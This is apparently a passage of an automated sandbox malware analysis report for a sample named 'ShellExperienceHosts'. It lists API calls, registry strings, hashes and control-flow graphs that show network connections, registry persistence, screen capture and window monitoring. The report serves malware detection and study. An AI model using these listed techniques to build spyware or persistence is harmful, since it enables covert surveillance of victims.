                                                                            • Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                            • Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64
                                                                            Function 03322DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 03322DBB
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03322DC7
                                                                            • timeGetTime.WINMM ref: 03322DCD
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 03322DFA
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03322E26
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03322E32
                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03322E51
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03322E5D
                                                                            • gethostbyname.WS2_32(00000000), ref: 03322E6B
                                                                            • htons.WS2_32(?), ref: 03322E8D
                                                                            • connect.WS2_32(?,?,00000010), ref: 03322EAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                            • String ID: 0u
                                                                            • API String ID: 640718063-3203441087
                                                                            • Opcode ID: df8729ba036e718eab993d511a264ce4bdbacc73c2e0eb1f4faa1694b461180e
                                                                            • Instruction ID: 5b9a5cb629b230ceb13fc071c1473be1da0ef7662ac7fc77d81aae57509fa81e
                                                                            • Opcode Fuzzy Hash: df8729ba036e718eab993d511a264ce4bdbacc73c2e0eb1f4faa1694b461180e
                                                                            • Instruction Fuzzy Hash: 09611E75A40304AFE720EFA5DC85FABB7B8FF48B10F104519F655EB290DBB0A9048B64
                                                                            Function 0332AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3609 332ad10-332ad2b 3610 332ad84-332ad8f 3609->3610 3611 332ad2d-332ad5b RegOpenKeyExW 3609->3611 3612 332b845-332b84b call 332ce00 3610->3612 3613 332ad95-332ad9c 3610->3613 3614 332ad79-332ad7e 3611->3614 3615 332ad5d-332ad73 RegQueryValueExW 3611->3615 3616 332b84e-332b854 3612->3616 3617 332afe3-332b09b call 332f707 call 3336770 call 332eff4 call 3337660 call 332f707 call 332cf20 call 332eff4 3613->3617 3618 332adea-332adf1 3613->3618 3614->3610 3614->3616 3615->3614 3667 332b162-332b189 call 332fa29 CloseHandle 3617->3667 3668 332b0a1-332b0ee call 3337660 RegCreateKeyW 3617->3668 3618->3616 3620 332adf7-332ae29 call 332f707 call 3336770 3618->3620 3632 332ae42-332ae4e 3620->3632 3633 332ae2b-332ae3f wsprintfW 3620->3633 3635 332ae50 3632->3635 3636 332ae9a-332aef1 call 332eff4 call 3337660 call 3322ba0 call 332efff * 2 3632->3636 3633->3632 3639 332ae54-332ae5f 3635->3639 3642 332ae60-332ae66 3639->3642 3645 332ae86-332ae88 3642->3645 3646 332ae68-332ae6b 3642->3646 3647 332ae8b-332ae8d 3645->3647 3650 332ae82-332ae84 3646->3650 3651 332ae6d-332ae75 3646->3651 3653 332aef4-332af09 3647->3653 3654 332ae8f-332ae98 3647->3654 3650->3647 3651->3645 3652 332ae77-332ae80 3651->3652 3652->3642 3652->3650 3657 332af10-332af16 3653->3657 3654->3636 3654->3639 3660 332af36-332af38 3657->3660 3661 332af18-332af1b 3657->3661 3666 332af3b-332af3d 3660->3666 3664 332af32-332af34 3661->3664 3665 332af1d-332af25 3661->3665 3664->3666 3665->3660 3670 332af27-332af30 3665->3670 3671 332afae-332afe0 call 332fa29 CloseHandle call 332efff 3666->3671 3672 332af3f-332af41 3666->3672 3686 332b0f0-332b13f call 332eff4 call 3325a30 RegDeleteValueW RegSetValueExW 3668->3686 3687 332b14a-332b15f RegCloseKey call 332fac9 3668->3687 3670->3657 3670->3664 3676 332af43-332af4e call 332efff 3672->3676 3677 332af55-332af5c 3672->3677 3676->3677 3684 332af70-332af74 3677->3684 3685 332af5e-332af69 call 332fac9 3677->3685 3688 332af76-332af7f call 332efff 3684->3688 3689 332af85-332afa9 call 332f020 3684->3689 3685->3684 3686->3687 3705 332b141-332b147 call 332fac9 3686->3705 3687->3667 3688->3689 3689->3636 3705->3687
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0332AD53
                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0332AD73
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenQueryValue
                                                                            • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                            • API String ID: 4153817207-1338088003
                                                                            • Opcode ID: 47970743038d2a83dba9115b504c26ab140cbad0054892c45e6496e053d9e824
                                                                            • Instruction ID: af331a59144302936fd86e86aac4842c34819ee60acba72410b65212cccce3e5
                                                                            • Opcode Fuzzy Hash: 47970743038d2a83dba9115b504c26ab140cbad0054892c45e6496e053d9e824
                                                                            • Instruction Fuzzy Hash: FFC1C6B5A00310ABE710EF24DC85F6BBBE8BF94714F094528F945AB281EB75E905C792
                                                                            Function 03325F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3746 3325f40-3325f7b CreateMutexW GetLastError 3747 3325f9b-3325fa2 3746->3747 3748 3325f7d 3746->3748 3750 3326003-332602d GetModuleHandleW GetConsoleWindow call 332e4f0 3747->3750 3751 3325fa4-3325faa 3747->3751 3749 3325f80-3325f99 Sleep CreateMutexW GetLastError 3748->3749 3749->3747 3749->3749 3757 3326048-332604f call 332e850 3750->3757 3758 332602f-3326045 call 332f00a 3750->3758 3752 3325fb0-3325fe1 call 3336770 lstrlenW call 3326d70 3751->3752 3765 3325ff3-3326001 Sleep 3752->3765 3766 3325fe3-3325ff1 lstrcmpW 3752->3766 3765->3750 3765->3752 3766->3750 3766->3765
                                                                            APIs
                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.11.26), ref: 03325F66
                                                                            • GetLastError.KERNEL32 ref: 03325F6E
                                                                            • Sleep.KERNEL32(000003E8), ref: 03325F85
                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.11.26), ref: 03325F90
                                                                            • GetLastError.KERNEL32 ref: 03325F92
                                                                            • _memset.LIBCMT ref: 03325FB9
                                                                            • lstrlenW.KERNEL32(?), ref: 03325FC6
                                                                            • lstrcmpW.KERNEL32(?,03345328), ref: 03325FED
                                                                            • Sleep.KERNEL32(000003E8), ref: 03325FF8
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 03326005
                                                                            • GetConsoleWindow.KERNEL32 ref: 0332600F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                            • String ID: 2024.11.26$key$open
                                                                            • API String ID: 2922109467-1532587582
                                                                            • Opcode ID: ce1081a3a1aa6d2f2b8c94a4310084f0080d0295f0ba34c800b6b9de2108afbb
                                                                            • Instruction ID: b540e7721a60797ead607fc734e8579cf06055cb32ee8cd4d1f4a05ec5631291
                                                                            • Opcode Fuzzy Hash: ce1081a3a1aa6d2f2b8c94a4310084f0080d0295f0ba34c800b6b9de2108afbb
                                                                            • Instruction Fuzzy Hash: EB21E476904315ABE610EB60ECC6B1AB79CAF84700F144819F604971D1EBB4F605CBA3
                                                                            Function 033262B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 033262CE
                                                                            • wsprintfW.USER32 ref: 03326336
                                                                            • RegOpenKeyExW.KERNELBASE(80000000,?,00000000,00020019,?), ref: 0332635F
                                                                            • _memset.LIBCMT ref: 03326376
                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 033263B2
                                                                            • lstrcatW.KERNEL32(03351F10,?), ref: 033263CE
                                                                            • lstrcatW.KERNEL32(03351F10,0334535C), ref: 033263DA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 033263E3
                                                                            • lstrlenW.KERNEL32(03351F10,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 03326427
                                                                            • lstrcatW.KERNEL32(03351F10,033453D4,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 0332643B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                            • API String ID: 1671694837-1583895642
                                                                            • Opcode ID: 3608ce7c9022790785ab7a2da982ac3027d4348a1ecd55f7905c7a0ba447f548
                                                                            • Instruction ID: a01beef782996540b0f671ea241fafb237ad8a9ccb464522697bc3799b9d3c32
                                                                            • Opcode Fuzzy Hash: 3608ce7c9022790785ab7a2da982ac3027d4348a1ecd55f7905c7a0ba447f548
                                                                            • Instruction Fuzzy Hash: 1D4175F5A402686FDB24DB54CC91FAEB7B8AF48705F0441C9F749A7181DA74AA80CF64
                                                                            Function 0332C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000002,?,18F775C8,?,00000000,?), ref: 0332C09E
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0332C0AA
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0332C0BF
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0332C0D5
                                                                            • EnterCriticalSection.KERNEL32(0334FB64), ref: 0332C113
                                                                            • LeaveCriticalSection.KERNEL32(0334FB64), ref: 0332C124
                                                                              • Part of subcall function 03329DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03329E04
                                                                              • Part of subcall function 03329DE0: GdipDisposeImage.GDIPLUS(?), ref: 03329E18
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0332C14C
                                                                              • Part of subcall function 0332A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0332A48D
                                                                              • Part of subcall function 0332A460: _free.LIBCMT ref: 0332A503
                                                                            • GetHGlobalFromStream.OLE32(?,?), ref: 0332C16D
                                                                            • GlobalLock.KERNEL32(?), ref: 0332C177
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0332C18F
                                                                              • Part of subcall function 03329BA0: DeleteObject.GDI32(?), ref: 03329BD2
                                                                              • Part of subcall function 03329BA0: EnterCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329BE3
                                                                              • Part of subcall function 03329BA0: EnterCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329BF8
                                                                              • Part of subcall function 03329BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03329B7B), ref: 03329C04
                                                                              • Part of subcall function 03329BA0: LeaveCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329C15
                                                                              • Part of subcall function 03329BA0: LeaveCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329C1C
                                                                            • GlobalSize.KERNEL32(00000000), ref: 0332C1A5
                                                                            • GlobalUnlock.KERNEL32(?), ref: 0332C221
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0332C249
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                            • String ID:
                                                                            • API String ID: 1483550337-0
                                                                            • Opcode ID: 93f47b30350d65c7b79fc8e86582af89344dd2db07b54a1d9f9785e3ba337bc9
                                                                            • Instruction ID: a8a5811ee8bf386b11f3095a19d56ddd0e0e76931b9bf358d4753faa19df73c3
                                                                            • Opcode Fuzzy Hash: 93f47b30350d65c7b79fc8e86582af89344dd2db07b54a1d9f9785e3ba337bc9
                                                                            • Instruction Fuzzy Hash: 126116B9D00218AFDB10EFA9D8C499EBBB8FF49710F14852AF515E7255DB34A901CB90
                                                                            Function 03326490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 033264C2
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 033264E2
                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03326524
                                                                            • _memset.LIBCMT ref: 03326560
                                                                            • _memset.LIBCMT ref: 0332658E
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 033265BA
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033265C3
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033265D5
                                                                            • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03326625
                                                                            • lstrlenW.KERNEL32(?), ref: 03326635
                                                                            Strings
                                                                            • Software\Tencent\Plugin\VAS, xrefs: 033264D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                            • String ID: Software\Tencent\Plugin\VAS
                                                                            • API String ID: 2921034913-3343197220
                                                                            • Opcode ID: 3baf5a270491dfa7735004f19f579e842ec109ff4cbdff38da2093ef25561a26
                                                                            • Instruction ID: 977ae693881d10113f55cd48a323ee1ed30c8003c5715a3ab70195a29298ce01
                                                                            • Opcode Fuzzy Hash: 3baf5a270491dfa7735004f19f579e842ec109ff4cbdff38da2093ef25561a26
                                                                            • Instruction Fuzzy Hash: 7D4175F5E40228ABD724DB54CDC5FEAB77DDF44700F004599F709B6041EA74AA858B64
                                                                            Function 6C7A138E Relevance: 18.2, APIs: 12, Instructions: 176memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6C8F4114,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C7A139F
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C7A1411
                                                                            • GlobalHandle.KERNEL32(6C8F4108), ref: 6C7A141B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 6C7A142D
                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 6C7A1448
                                                                            • GlobalLock.KERNEL32(00000000), ref: 6C7A1453
                                                                            • LeaveCriticalSection.KERNEL32(6C8F4114), ref: 6C7A14A0
                                                                            • GlobalHandle.KERNEL32(6C8F4108), ref: 6C7A14B4
                                                                            • GlobalLock.KERNEL32(00000000), ref: 6C7A14BF
                                                                            • LeaveCriticalSection.KERNEL32(6C8F4114,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C7A14CE
                                                                            • EnterCriticalSection.KERNEL32(6C6B14F3,6C8F40F8,00000001,6C8F4108,?,?,?,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8), ref: 6C7A14EB
                                                                            • LeaveCriticalSection.KERNEL32(6C6B14F3,?,?,?,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA), ref: 6C7A1548
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$Leave$AllocEnterHandleLock$Unlock
                                                                            • String ID:
                                                                            • API String ID: 2233717024-0
                                                                            • Opcode ID: 9997bc117c90c0c938bc6f696ea6b0aee761afc9fed15f0d599e9d6097060291
                                                                            • Instruction ID: fc70e5a11373a00b4f435967152fc34da147fdc2f7132be80eeaace0d9f75a01
                                                                            • Opcode Fuzzy Hash: 9997bc117c90c0c938bc6f696ea6b0aee761afc9fed15f0d599e9d6097060291
                                                                            • Instruction Fuzzy Hash: 9451A07160061AEFEB14CFA8C988B59B7B9FF05315F104269E466D7A40DB70F952CB90
                                                                            Function 0332A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0332A48D
                                                                            • _malloc.LIBCMT ref: 0332A4D1
                                                                            • _free.LIBCMT ref: 0332A503
                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0332A522
                                                                            • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0332A594
                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0332A59F
                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0332A5C5
                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0332A5DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                            • String ID: &
                                                                            • API String ID: 2794124522-3042966939
                                                                            • Opcode ID: bdfc54c52fc7ae040221f49c1d7cdd29bda8b3d3dbd27116f61cf994def64bea
                                                                            • Instruction ID: 3ca1db08e0c0c669728898cbb4b57d30e69ba7f0a525920a0d41f632a9a8f576
                                                                            • Opcode Fuzzy Hash: bdfc54c52fc7ae040221f49c1d7cdd29bda8b3d3dbd27116f61cf994def64bea
                                                                            • Instruction Fuzzy Hash: 9C514575E002259FDB04DFA4D8C4AEFBBB8EF48710F148559E905AB250DB34E945CBE0
                                                                            Function 100052B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                            • String ID: IpDates_info$SOFTWARE
                                                                            • API String ID: 864241144-2243437601
                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                            • Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                            • Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2
                                                                            Function 100052D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                            • String ID: IpDates_info$SOFTWARE
                                                                            • API String ID: 864241144-2243437601
                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761
                                                                            Function 0332CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,033412F8,18F775C8,00000001,00000000,00000000), ref: 0332CAB1
                                                                            • RegQueryInfoKeyW.ADVAPI32(033412F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0332CAE0
                                                                            • _memset.LIBCMT ref: 0332CB44
                                                                            • _memset.LIBCMT ref: 0332CB53
                                                                            • RegEnumValueW.KERNEL32(033412F8,?,00000000,?,00000000,?,00000000,?), ref: 0332CB72
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                              • Part of subcall function 0332F707: std::exception::exception.LIBCMT ref: 0332F756
                                                                              • Part of subcall function 0332F707: std::exception::exception.LIBCMT ref: 0332F770
                                                                              • Part of subcall function 0332F707: __CxxThrowException@8.LIBCMT ref: 0332F781
                                                                            • RegCloseKey.KERNEL32(033412F8,?,?,?,?,?,?,?,?,?,?,?,00000000,033412F8,000000FF), ref: 0332CC83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                            • String ID: Console\0
                                                                            • API String ID: 1348767993-1253790388
                                                                            • Opcode ID: 6a5f26959a0c77c0945fcf795851a3c3f15827b11bd952b9f2e6d0e2a2802ad0
                                                                            • Instruction ID: 57ea4c952ad659bfe2fa937437e41557d7e2c1635be5c0d61b810af000ea2b73
                                                                            • Opcode Fuzzy Hash: 6a5f26959a0c77c0945fcf795851a3c3f15827b11bd952b9f2e6d0e2a2802ad0
                                                                            • Instruction Fuzzy Hash: CF61FEB5D00219AFDB04DFA8D8C1EAEBBB9FB49310F144669F915E7245DB34A901CBA0
                                                                            Function 0332BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • _memset.LIBCMT ref: 0332BB21
                                                                            • GetLastInputInfo.USER32(?), ref: 0332BB37
                                                                            • GetTickCount.KERNEL32 ref: 0332BB3D
                                                                            • wsprintfW.USER32 ref: 0332BB66
                                                                            • GetForegroundWindow.USER32 ref: 0332BB6F
                                                                            • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0332BB83
